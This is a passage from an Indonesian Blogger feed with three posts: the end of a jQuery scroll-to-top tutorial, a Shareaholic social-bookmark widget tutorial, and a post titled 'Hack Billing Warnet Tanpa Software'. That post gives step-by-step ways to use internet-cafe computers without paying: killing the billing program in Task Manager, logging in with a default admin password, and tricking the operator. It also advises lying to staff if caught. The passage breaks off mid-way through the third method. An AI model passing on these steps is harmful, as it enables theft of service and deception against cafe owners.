&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; if (this.state.shouldvisible &amp;amp;&amp;amp; !this.state.isvisible){&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; this.$control.stop().animate({opacity:1}, this.setting.fadeduration[0])&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; this.state.isvisible=true&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; }&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; else if (this.state.shouldvisible==false &amp;amp;&amp;amp; this.state.isvisible){&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; this.$control.stop().animate({opacity:0}, this.setting.fadeduration[1])&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; this.state.isvisible=false&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; }&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; },&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; init:function(){&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; jQuery(document).ready(function($){&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; var mainobj=scrolltotop&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; var iebrws=document.all&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mainobj.cssfixedsupport=!iebrws || iebrws &amp;amp;&amp;amp; 
document.compatMode==&quot;CSS1Compat&quot; &amp;amp;&amp;amp; window.XMLHttpRequest //not
 IE or IE7+ browsers in standards mode&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mainobj.$body=(window.opera)? (document.compatMode==&quot;CSS1Compat&quot;? $(&#39;html&#39;) : $(&#39;body&#39;)) : $(&#39;html,body&#39;)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mainobj.$control=$(&#39;&amp;lt;div id=&quot;topcontrol&quot;&amp;gt;&#39;+mainobj.controlHTML+&#39;&amp;lt;/div&amp;gt;&#39;)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; .css({position:mainobj.cssfixedsupport? &#39;fixed&#39; : 
&#39;absolute&#39;, bottom:mainobj.controlattrs.offsety, 
right:mainobj.controlattrs.offsetx, opacity:0, cursor:&#39;pointer&#39;})&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; .attr({title:&#39;Scroll Back to Top&#39;})&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; .click(function(){mainobj.scrollup(); return false})&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; .appendTo(&#39;body&#39;)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; if (document.all &amp;amp;&amp;amp; !window.XMLHttpRequest 
&amp;amp;&amp;amp; mainobj.$control.text()!=&#39;&#39;) //loose check for IE6 and below,
 plus whether control contains any text&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mainobj.$control.css({width:mainobj.$control.width()}) 
//IE6- seems to require an explicit width on a DIV containing text&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mainobj.togglecontrol()&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; $(&#39;a[href=&quot;&#39; + mainobj.anchorkeyword +&#39;&quot;]&#39;).click(function(){&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mainobj.scrollup()&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; return false&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; })&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; $(window).bind(&#39;scroll resize&#39;, function(e){&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mainobj.togglecontrol()&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; })&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; })&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; }&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;scrolltotop.init()&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;Keterangan :&lt;/b&gt; &lt;b&gt;URL &lt;/b&gt;yang saya beri &lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;warna &lt;/b&gt;&lt;/span&gt;merah di atas adalah url foto yang sudah diuplaod sebelumnya, silahkan dengan url foto sobat.&lt;/div&gt;
&lt;/blockquote&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;ul&gt;
&lt;li&gt;Simpan dan lihat hasilnya.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;b&gt;Selamat mencoba dan Semoga artikel yang saya share kali ini ada manfaatnya, terima kasih dan happy blogging...!!!&lt;/b&gt; &lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/666364274778285634/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/01/cara-membuat-tombol-back-to-top-dengan.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/666364274778285634'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/666364274778285634'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/01/cara-membuat-tombol-back-to-top-dengan.html' title='Cara Membuat Tombol Back To Top Dengan CSS'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-VHxeG9AlJbHKLnRIBew-QlSlsS__P8Su6Ja1VlgXQtTtsvX03pPFt7w5I9l5ZlxhRu7ka-g_ZMN_O7Iowtnhq0I3_a98FprJqWQhwcOWTlHoCqs_mtolGGpylxMZ2K0pUopKbbEGhVFX/s72-c/back-to-top-navigation.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8688056575447479178.post-938180593637527540</id><published>2013-01-24T05:02:00.001-08:00</published><updated>2013-01-24T05:52:23.134-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="widgets"/><title type='text'>Membuat Sosial Bookmark Shareholic  Di Blog</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisybI1IXSHp8R2DAFV-FN3byL0fNpr3VR0pYTOR8TjVojs5LCG8fbMn_1HIhVhM-CYUbmXzvjbd1SyDciuxy1CqysB_Fp7XXS-CvaV_Ls0gLJ286grkU4H2GTVXQJnr2a-Z8YMhFNgATTR/s1600/Screenshot+from+2012-11-08+22:26:36.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Markup Validation Service&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisybI1IXSHp8R2DAFV-FN3byL0fNpr3VR0pYTOR8TjVojs5LCG8fbMn_1HIhVhM-CYUbmXzvjbd1SyDciuxy1CqysB_Fp7XXS-CvaV_Ls0gLJ286grkU4H2GTVXQJnr2a-Z8YMhFNgATTR/s1600/Screenshot+from+2012-11-08+22:26:36.png&quot; title=&quot;republicofnote.blogspot.com&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Sosial Bookmark..?&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Blog mana sih sekarang yang g pake fitur tersebut, hal ini juga 
diwajibkan guna mendapatkan visitor atau pengunjung agar tertarik ke 
blog kita. Ini dia sosial bookmark yang keren nan canggih, karena berada
 di sisi pojok kiri blog, sangat menarik sekali, saya terinspirasi ingin
 tahu karena saya juga pernah melihat dari beberapa blog unggulan saya 
yang saya bookmar, maka dari itu saya ingin mencari tahu kode dan cara 
pemasangannya, dan akhirnya dapet juga, maka dari itu saya akan share 
kepada kalian semua bagaimana cara menerapkannya...&amp;nbsp;widget ini berupa 
animasi dengan bentuk setengah lingkaran. Tombol ini akan memunculkan 
shorcut ke beberapa sosial bookmark yang lagi trend saat ini semacam : &lt;span style=&quot;color: blue;&quot;&gt;Pinterest, Google+, Facebook, Twitter, Tumblr&lt;/span&gt; dan juga &lt;span style=&quot;color: blue;&quot;&gt;Email.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;Cara Menambahkan Tombol Animasi Sosial Bookmark ke Template Blogger&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;i&gt;&lt;b&gt;Langkahnya&lt;/b&gt;&lt;/i&gt; :&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
1. Login ke akun blogger anda ⳾ &lt;span style=&quot;color: orange;&quot;&gt;Template&lt;/span&gt; ⳾ &lt;span style=&quot;color: orange;&quot;&gt;EDIT HTML&lt;/span&gt; (centang expand widget template).&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Jangan lupa untuk selalu melakukan backup Template anda lebih dulu 
sebelum melakukan perubahan apapun pada script html template.&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
2. Cari kode berikut ini : (Gunakan tombol Ctrl+F untuk membantu pencarian)&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;span style=&quot;color: orange;&quot;&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
3. Copy dan Paste kode berikut ini tepat di atas / sebelum kode &lt;span style=&quot;color: orange;&quot;&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;color: orange;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;span style=&quot;color: #3d85c6;&quot;&gt;&amp;lt;!-- Start Shareaholic Sassy Bookmarks HTML - http://abrian-pamungkaz.blogspot.com --&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #3d85c6;&quot;&gt;&amp;lt;div class=&#39;shr_ss shr_publisher&#39;&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #3d85c6;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: #3d85c6;&quot;&gt;&amp;lt;/div&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #3d85c6;&quot;&gt;&amp;lt;!-- End Shareaholic Sassy Bookmarks HTML --&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #3d85c6;&quot;&gt;&amp;lt;!-- Start Shareaholic Sassy Bookmarks settings --&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #3d85c6;&quot;&gt;&amp;lt;script type=&#39;text/javascript&#39;&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #3d85c6;&quot;&gt;var SHRSS_Settings = 
{&amp;amp;quot;shr_ss&amp;amp;quot;:{&amp;amp;quot;src&amp;amp;quot;:&amp;amp;quot;//dtym7iokkjlif.cloudfront.net/media/downloads/sassybookmark&amp;amp;quot;,&amp;amp;quot;link&amp;amp;quot;:&amp;amp;quot;&amp;amp;quot;,&amp;amp;quot;service&amp;amp;quot;:&amp;amp;quot;5,7,2,313,38,201,88,74&amp;amp;quot;,&amp;amp;quot;apikey&amp;amp;quot;:&amp;amp;quot;b87f5899d80a5edce8b5e55f58542ef0f&amp;amp;quot;,&amp;amp;quot;localize&amp;amp;quot;:true,&amp;amp;quot;shortener&amp;amp;quot;:&amp;amp;quot;bitly&amp;amp;quot;,&amp;amp;quot;shortener_key&amp;amp;quot;:&amp;amp;quot;&amp;amp;quot;,&amp;amp;quot;designer_toolTips&amp;amp;quot;:true,&amp;amp;quot;tip_bg_color&amp;amp;quot;:&amp;amp;quot;black&amp;amp;quot;,&amp;amp;quot;tip_text_color&amp;amp;quot;:&amp;amp;quot;white&amp;amp;quot;,&amp;amp;quot;viewport&amp;amp;quot;:true,&amp;amp;quot;twitter_template&amp;amp;quot;:&amp;amp;quot;${title}
 - ${short_link} via @Shareaholic&amp;amp;quot;}};&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #3d85c6;&quot;&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #3d85c6;&quot;&gt;&amp;lt;!-- End Shareaholic Sassy Bookmarks settings --&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #3d85c6;&quot;&gt;&amp;lt;!-- Start Shareaholic Sassy Bookmarks script --&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #3d85c6;&quot;&gt;&amp;lt;script type=&#39;text/javascript&#39;&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #3d85c6;&quot;&gt;(function() {&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #3d85c6;&quot;&gt;var sb = document.createElement(&amp;amp;quot;script&amp;amp;quot;); sb.type = &amp;amp;quot;text/javascript&amp;amp;quot;;sb.async = true;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #3d85c6;&quot;&gt;sb.src = (&amp;amp;quot;https:&amp;amp;quot; == 
document.location.protocol ? 
&amp;amp;quot;https://dtym7iokkjlif.cloudfront.net&amp;amp;quot; : 
&amp;amp;quot;http://cdn.shareaholic.com&amp;amp;quot;) + 
&amp;amp;quot;/media/js/jquery.shareaholic-publishers-ss.min.js&amp;amp;quot;;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #3d85c6;&quot;&gt;var s = document.getElementsByTagName(&amp;amp;quot;script&amp;amp;quot;)[0]; s.parentNode.insertBefore(sb, s);&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #3d85c6;&quot;&gt;})();&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #3d85c6;&quot;&gt;&amp;lt;/script&amp;gt;&amp;lt;small&amp;gt;&amp;lt;a 
href=&#39;http://republicofnote.blogspot.com/&#39;&amp;gt;Animated Social 
Widget&amp;lt;/a&amp;gt; - &amp;lt;a 
href=&#39;http://republicofnote.blogspot.com/&#39;&amp;gt;Blogger And Wordpress 
Tips&amp;lt;/a&amp;gt;&amp;lt;/small&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #3d85c6;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: #3d85c6;&quot;&gt;&amp;lt;!-- End Shareaholic Sassy Bookmarks script --&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #3d85c6;&quot;&gt;&amp;lt;!-- End Shareaholic Sassy Bookmarks HTML - http://abrian-pamungkaz.blogspot.com --&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #3d85c6;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
4. Preview hasilnya dulu, jika tidak ada masalah, Simpan /&lt;span style=&quot;color: orange;&quot;&gt;Save Template&lt;/span&gt;.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Jika langkah diatas telah kalian lakukan dengan benar maka tidak akan terjadi masalah dan widget sosial bookmark itupun muncul.&lt;br /&gt;
Demikian &lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/2013/01/membuat-sosial-bookmark-shareholic-di.html&quot;&gt;cara membuat sosial bookmark shareholic di blog&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Selamat mencoba..&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/938180593637527540/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/01/membuat-sosial-bookmark-shareholic-di.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/938180593637527540'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/938180593637527540'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/01/membuat-sosial-bookmark-shareholic-di.html' title='Membuat Sosial Bookmark Shareholic  Di Blog'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisybI1IXSHp8R2DAFV-FN3byL0fNpr3VR0pYTOR8TjVojs5LCG8fbMn_1HIhVhM-CYUbmXzvjbd1SyDciuxy1CqysB_Fp7XXS-CvaV_Ls0gLJ286grkU4H2GTVXQJnr2a-Z8YMhFNgATTR/s72-c/Screenshot+from+2012-11-08+22:26:36.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8688056575447479178.post-69081270357091686</id><published>2012-12-16T04:49:00.001-08:00</published><updated>2013-01-24T05:54:34.691-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><title type='text'>Hack Billing Warnet Tanpa Software</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_VB-LP3SFWG2qWd_xZpNO6VW1r8KJEgzgBpkLuVuSq1r4ogfnLsubAlHoxwFEJI2F87BkCGVSvkMIeb01QAFq-iBdQ33bVQuS8oZsSsNqpfQKV4-Pe8MJ3eXbQcmtq9D5YeTx5hLnQ-Y/s1600/hacking.jpg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;159&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_VB-LP3SFWG2qWd_xZpNO6VW1r8KJEgzgBpkLuVuSq1r4ogfnLsubAlHoxwFEJI2F87BkCGVSvkMIeb01QAFq-iBdQ33bVQuS8oZsSsNqpfQKV4-Pe8MJ3eXbQcmtq9D5YeTx5hLnQ-Y/s200/hacking.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;i&gt;&lt;u&gt;Cara Yang Pertama Menghack Billing&lt;/u&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
Metode ini hanya sederhana hanya dengan mematikan billing diwarnet kita 
dapat ber internetan ria tanpa kena biaya alias biayanya tetap nol dan 
tidak pakai software softweran&lt;br /&gt;
coba simak caranya disini :&lt;br /&gt;
&lt;br /&gt;
pertama pilih komputernya dan lakukan prosedur berikut&lt;br /&gt;
&lt;br /&gt;
merestart.nya….
 kemudian pas ada tulisan WELCOME pada windows persiapkan diri anda 
untuk menekan tombol ctrl+alt+del,jangan sampe kedahuluan muncul ya 
BILLING.NYa!…. lalu setelah anda tekan tombol tadi maka akan muncul 
windows task manager, lalu klik END TASK pada progam Billing.nya, 
jreeeeeeeenk, udah deh kita bisa internetan tanpa harus bayar&lt;br /&gt;
&lt;br /&gt;
kalau ketahuan gimana, gampang tinggal bilang saja, komputer ini dari tadi sudah hidup, beres khan&lt;br /&gt;
&lt;br /&gt;
tetapi dosa ditanggung sendiri yaaa&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;&lt;i&gt;Cara Yang Kedua Menghack Billing&lt;/i&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
Oke gk usah basa-basi ,, langsung Aja Ke TKP &lt;br /&gt;
&lt;br /&gt;
-Pertama Restar Komputer Client&lt;br /&gt;
-Ntar Jendela Billing Keluar Lagi Please Wait&lt;br /&gt;
- Hanya Panduan Dan Admin Yng Bisa Diklik&lt;br /&gt;
- Dengan Cepat Langsung Aja Ambil Admin nya&lt;br /&gt;
- Nama usernya biarkan Admin passnya 008&lt;br /&gt;
-TRus klik ok&lt;br /&gt;
- Klik Exit Client Dan berikan Pass nya 008 juga&lt;br /&gt;
-ntar keluar lagi jendelanya,,&lt;br /&gt;
-Ada Tulisan Exit Client yng dipojok kanan bawah ganti passwordnya dengan 008&lt;br /&gt;
-lalu klik ok,, jreeeeeeeeng.,,,,,,&amp;nbsp;&amp;nbsp; JENDELA BILLING SUDAH TERBUKA,,, SELAMAT MENIKMATI..,,&lt;br /&gt;
&lt;u&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/u&gt;
&lt;u&gt;&lt;i&gt;Cara Yang Ke Tiga Menghack Billing&lt;/i&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
Langsung Aja Ke TKP&lt;br /&gt;
PERHATIAAN!!!!&lt;br /&gt;
TIPS INI HANYA BERLAKU UNTUK YANG MAEN PERSONAL, TIDAK BERLAKU UNTUK PAKET,.. OK,,,&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-Misalnya duit anda sedang bokek,,&lt;br /&gt;
-Main aja dulu beberapa menit, &lt;br /&gt;
-Setelah Itu Stand By kan komputer kalian&lt;br /&gt;
-Suruh Operator Matikan Komputer kita,,,,jangan dimatikan melalui 
komputer client ,,udah dimatikan komputer client (kita) oleh operator&lt;br /&gt;
